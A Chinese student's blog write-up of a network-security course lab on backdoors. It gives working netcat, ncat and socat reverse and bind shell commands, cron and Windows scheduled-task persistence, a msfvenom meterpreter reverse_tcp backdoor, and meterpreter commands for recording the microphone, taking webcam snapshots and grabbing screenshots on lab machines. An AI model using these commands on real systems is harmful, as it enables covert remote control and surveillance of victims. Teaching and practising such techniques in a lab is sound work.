20155331 丹增旦达 网络攻防 Exp2后门原理与实践

20155331 丹增旦达《网络攻防》Exp2后门原理与实践

实验内容

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

实验过程

windows获取shell

首先查看windows的ip地址:

下载ncat并进入该目录,打开cmd

Linux反弹连接Win,输入命令nc 192.168.217.130 5331 -e /bin/sh

Windows下获得一个linux shell,可运行任何指令,如ls:

Linux获得Win Shell

用ifconfig命令查看本机IP

Linux运行监听指令,输入命令nc -l -p 5331

Windows反弹连接Linux,在ncat目录下输入命令ncat.exe -e cmd.exe 192.168.217.128 5331

Linux下看到Windows的命令提示

使用netcat获取主机操作Shell,cron启动

先在Windows系统下,ncat.exe -l -p 5331,监听端口

用crontab -e指令编辑一条定时任务。

在最后一行加入XX * * * * /bin/netcat XXXXXXX 5331 -e /bin/sh,

到时间后,便获得了Kali的shell,可以输入指令

使用socat获取主机操作Shell, 任务计划启动

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5331 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5331,同时把cmd.exe的stderr重定向到stdout上

创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

此时,在Kali环境下输入指令socat - tcp:192.168.1.227:5331,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5331端口,此时可以发现已经成功获得了一个cmd shell

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=5331 -f exe > 20155331_backdoor.exe

然后通过nc指令将生成的后门程序传送到Windows主机上

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

在Kali Linux中输入msfconsole命令:

之后逐步输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.211.55.10 //注意此处应为Linux的IP!
set LPORT 5331
//5314为端口号
show options
exploit

输入命令record_mic可以截获一段音频:

使用webcam_snap指令可以使用摄像头进行拍照,不过我这个摄像头一直打不开,,

使用screenshot指令可以进行截屏

posted @ 2018-04-03 13:32  20155331  阅读(179)  评论(0编辑  收藏  举报